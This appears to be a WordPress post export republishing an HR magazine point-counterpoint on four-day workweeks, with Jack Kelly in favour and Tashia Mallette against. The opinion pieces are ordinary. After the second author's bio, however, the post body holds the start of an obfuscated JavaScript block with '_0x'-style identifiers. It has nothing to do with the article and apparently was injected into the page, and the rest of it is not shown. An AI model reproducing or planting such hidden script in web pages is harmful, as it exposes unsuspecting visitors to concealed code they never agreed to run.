{"id":40902,"date":"2022-11-23T16:29:30","date_gmt":"2022-11-23T16:29:30","guid":{"rendered":"https:\/\/www.shrm.org\/hr-today\/news\/hr-magazine\/winter2022\/pages\/are-shorter-workweeks-good-for-business.aspx"},"modified":"2022-11-23T16:29:30","modified_gmt":"2022-11-23T16:29:30","slug":"are-shorter-workweeks-good-for-business","status":"publish","type":"post","link":"https:\/\/squarehr.com\/index.php\/2022\/11\/23\/are-shorter-workweeks-good-for-business\/","title":{"rendered":"Are Shorter Workweeks Good for Business?"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.shrm.org\/image\/upload\/c_crop%2ch_100%2cw_100%2cx_0%2cy_0\/e_sharpen\/c_fit%2cf_auto%2cq_auto%2cw_60\/v1\/Magazine\/yes_okpf0l\" data-transbtoa=\"eyIxeDEiOnsieCI6MCwieSI6MCwieDIiOjEwMCwieTIiOjEwMCwidyI6MTAwLCJoIjoxMDB9LCIxeDFfdGh1bWIiOnsieCI6MCwieSI6MCwieDIiOjEwMCwieTIiOjEwMCwidyI6MTAwLCJoIjoxMDB9fQ==\" data-publicid=\"Magazine\/yes_okpf0l\" class=\"1x1_thumb shrm-Style-PullLeft\" alt=\"yes\"><span><br \/><span><span>It\u2019s time to adopt better and more-efficient ways to work.<\/span><\/span><\/span><\/p>\n<div> <img decoding=\"async\" src=\"https:\/\/www.shrm.org\/hr-today\/news\/hr-magazine\/winter2022\/PublishingImages\/Pages\/are-shorter-workweeks-good-for-business\/Screen%20Shot%202022-11-22%20at%2014549%20PM.png\" data-transbtoa=\"eyIzeDQiOnsieCI6ODg2LCJ5IjowLCJ4MiI6MjY4NiwieTIiOjI0MDAsInciOjE4MDAsImgiOjI0MDB9fQ==\" data-publicid=\"Magazine\/190826-CAHR-S2-045-Baskaran-Ambalavanan-006_tv5htz\" class=\"3x4\" alt=\"Jack Kelly\" data-caption=\"Jack Kelly\"> <\/div>\n<p class=\"shrm-Element-P\">It&nbsp;may seem counterintuitive, but abbreviated workweeks are good for employees, customers and the bottom line. The traditional schedule of working 9 a.m. to 5 p.m., five days a week, isn\u2019t necessarily the best model. It\u2019s time to adopt broader workplace innovations\u2014including shorter workweeks.<\/p>\n<p class=\"shrm-Element-P\">The pandemic made people realize there are better and more-efficient ways to work. Companies looking to capitalize on this revelation are providing employees with four-day workweeks, flexible schedules, and the autonomy to work where and when they want\u2014either as digital nomads or in hybrid work arrangements.<\/p>\n<p class=\"shrm-Element-P\">The pandemic also led to rising levels of employee stress, anxiety and burnout. Prolonged, unrelenting pressures can lead workers to experience emotional, mental and physical exhaustion. If employees feel depleted, they cannot perform their jobs to the best of their abilities and are more likely to become jaded and disengaged. Instead of forcing a person to be chained to a computer for an arbitrary time period, organizations can help relieve workers\u2019 stress and free them to do their best work by offering shortened workweeks, among other things.<\/p>\n<p class=\"shrm-Element-P\">A shortened workweek does not mean there will be less worker output. When employees have freedom, they feel appreciated and respected\u2014and they are engaged. According to research from 4 Day Week Global, a nonprofit coalition that advocates reduced working hours, 78 percent of employees with four-day workweeks reported being happier and less stressed.&nbsp;<\/p>\n<p class=\"shrm-Element-P\">Moreover, 63 percent of businesses using the four-day model find it easier to attract and retain talent, according to the research. Companies that invest in worker health and well-being can also expect employees to take fewer sick and mental health days.&nbsp;<\/p>\n<p class=\"shrm-Element-P\">Iceland, Scotland, Belgium, Spain and other countries, as well as some global companies, have instituted four-day workweeks on a trial basis. The results have been encouraging. Employees not only have maintained the same or higher levels of productivity over fewer hours, but also have reported increased job satisfaction, teamwork, work\/life balance and company loyalty.<\/p>\n<p class=\"shrm-Element-P\">Iceland\u2019s trial of the shortened workweek, run by the Reykjav\u00edk City Council and the national government, has been an overwhelming success. Worker well-being flourished across a range of indicators, including perceived stress, burnout, health and work\/life balance. As a result of the trial\u2019s positive results, 86 percent of Iceland\u2019s workers now work reduced hours for the same pay or will gain the right to do so.&nbsp;<\/p>\n<p class=\"shrm-Element-P\">In Japan, which is known for having high expectations in terms of work ethic, Microsoft Japan offered its 2,300 employees shorter workweeks. The company\u2019s Work-Life Choice Challenge 2019 program gave employees the opportunity to \u201cchoose a variety of flexible work styles, according to the circumstances of work and life.\u201d Management wanted to see if there would be a corresponding increase in productivity and morale. The results? Workers were both happier and 40 percent more productive.&nbsp;<\/p>\n<p class=\"shrm-Element-P\">U.S. Rep. Mark Takano, D-Calif., introduced a bill last year that would have reduced the standard workweek from 40 hours to 32 for companies with more than 500 employees. Takano said at the time that \u201cpilot programs run by governments and businesses across the globe have shown promising results, as productivity climbed and workers reported better work\/life balance, less need to take sick days, heightened morale, and lower child care expenses because they had more time with their family and children.\u201d<\/p>\n<p class=\"shrm-Element-P\">There\u2019s little doubt that workers value shorter workweeks\u2014and that can be good for U.S. business.<\/p>\n<p class=\"shrm-Element-P\"> <em>Jack Kelly is CEO and founder of New York City-based <\/em> <a href=\"https:\/\/compliancesearch.com\/\" target=\"_blank\" rel=\"noopener noreferrer\"> <em>Compliance Search Group<\/em><\/a><em> and <\/em> <a href=\"https:\/\/wecruitr.io\/\"> <em>WeCruitr<\/em><\/a><em>, which he started in the early days of the COVID-19 pandemic to help people in need find jobs. He is a senior contributor for Forbes.<\/em><\/p>\n<p class=\"shrm-Element-P\"> <br class=\"Apple-interchange-newline\"> <img decoding=\"async\" src=\"https:\/\/cdn.shrm.org\/image\/upload\/c_crop%2ch_84%2cw_84%2cx_0%2cy_1\/e_sharpen\/c_fit%2cf_auto%2cq_auto%2cw_60\/v1\/Magazine\/Screen_Shot_2018-01-22_at_11.22.32_AM_qjruy1\" data-transbtoa=\"eyIxeDFfdGh1bWIiOnsieCI6MCwieSI6MSwieDIiOjg0LCJ5MiI6ODUsInciOjg0LCJoIjo4NH19\" data-publicid=\"Magazine\/Screen_Shot_2018-01-22_at_11.22.32_AM_qjruy1\" class=\"1x1_thumb shrm-Style-PullLeft\" alt=\"no\">\n<\/p>\n<p class=\"shrm-Element-Subtitle\"> <span><span>The problem is the way work is done, not the number of hours worked.<\/span><\/span><\/p>\n<div>\n<p class=\"shrm-Element-P\"> <img decoding=\"async\" src=\"https:\/\/www.shrm.org\/hr-today\/news\/hr-magazine\/winter2022\/PublishingImages\/Pages\/are-shorter-workweeks-good-for-business\/Screen%20Shot%202022-11-22%20at%2014601%20PM.png\" data-transbtoa=\"eyIzeDQiOnsieCI6ODg2LCJ5IjowLCJ4MiI6MjY4NiwieTIiOjI0MDAsInciOjE4MDAsImgiOjI0MDB9fQ==\" data-publicid=\"Magazine\/190826-CAHR-S2-045-Baskaran-Ambalavanan-006_tv5htz\" class=\"3x4\" alt=\"Tashia Mallette, SHRM-SCP\" data-caption=\"Tashia Mallette, SHRM-SCP\"> <span aria-hidden=\"true\"><\/span><\/p>\n<\/div>\n<p class=\"shrm-Element-P\">Employers have a tremendous opportunity to transform the future of work, but they should think twice about shortening the workweek.<\/p>\n<p class=\"shrm-Element-P\">The truth is, achieving a meaningful workplace transformation could be a heavy lift, as Industrial Age practices and mindsets still exist today. Outdated beliefs and personal biases about in-person work and productivity surfaced prominently during the pandemic as organizations literally lost sight of their employees and struggled to define measures of success for their displaced workforces.<\/p>\n<p class=\"shrm-Element-P\">But the pandemic also gave many workers the ability to work remotely or in a hybrid capacity for the first time. The McKinsey &amp; Co. American Opportunity Survey found that 58 percent of respondents can now work remotely at least one day per week. That puts employers in a unique position to help meet their employees\u2019 needs for work\/life balance\u2014without shortening the workweek and worrying about decreased productivity or the effect on the bottom line.<\/p>\n<p class=\"shrm-Element-P\">Programs that support work\/life balance typically provide big returns in retention, attraction and engagement that will help employers compete for workers. Employees consistently rank these programs highly. In a recent Forbes Health-Ipsos monthly tracker poll, workers said work\/life balance is the second most important aspect of their job, just below financial security.<\/p>\n<p class=\"shrm-Element-P\">Better work\/life balance can also reduce the devastating effects that chronic stress has on employees\u2019 physical and mental health, regardless of how many hours they work. The prevalence of work-induced stress accelerated by the pandemic will only increase further if employees are required to do the same amount of work in less time.<\/p>\n<p class=\"shrm-Element-P\">Work-related stress is a symptom of deeper organizational design problems. The National Institute for Occupational Safety and Health suggests that employers act to reduce causes of stress by routinely reviewing workers\u2019 job designs, workloads, schedules, roles and responsibilities.&nbsp;<\/p>\n<p class=\"shrm-Element-P\">Company leaders might also consider replacing the output-based productivity work model, which is a relic of the Industrial Age. Deloitte and other consultancies suggest that organizations use an outcome-centric approach to drive effectiveness, efficiency and empowerment across the organization.<\/p>\n<p class=\"shrm-Element-P\">As part of that, managers would shift from micromanaging the how, when and where work is performed to ensuring the work gets done. When that happens, studies show, employees feel more empowered and productive. The time managers spend managing output can be reallocated to activities such as coaching and development. There never seems to be enough time in the day, and shortening the workweek could further limit the valuable time managers have for themselves and their staffs.<\/p>\n<p class=\"shrm-Element-P\">The 40-hour workweek also provides an important platform for employers to help enrich the lives of their employees and communities through company-sponsored initiatives centered on diversity, equity and inclusion; volunteerism; and humanitarianism. According to research from America\u2019s Charities, 71 percent of surveyed employees say it is imperative or very important that they work at an employer where the culture is supportive of giving and volunteering. Employers that offer these types of programs experience higher levels of engagement and retention as employees find meaning and purpose through work.<\/p>\n<p class=\"shrm-Element-P\">Shortening the workweek may reduce employers\u2019 ability to offer these programs during paid work time. That would likely cause a reduction in employee participation, and worthy causes could experience a drop in awareness, funding and volunteers.<\/p>\n<p class=\"shrm-Element-P\">There are many ways to give workers what they need. Employers would be wise to consider whether shorter workweeks are really necessary.<\/p>\n<p class=\"shrm-Element-P\"> <em>Tashia Mallette, SHRM-SCP, is the founder&nbsp;and principal chief people officer at <\/em> <a href=\"https:\/\/www.thehrxgroup.com\/\"> <em>HR Exchange Group<\/em><\/a><em>, a Los Angeles-based consulting firm providing fractional chief people officer services to companies experiencing&nbsp;rapid growth or transformation.<\/em><\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const 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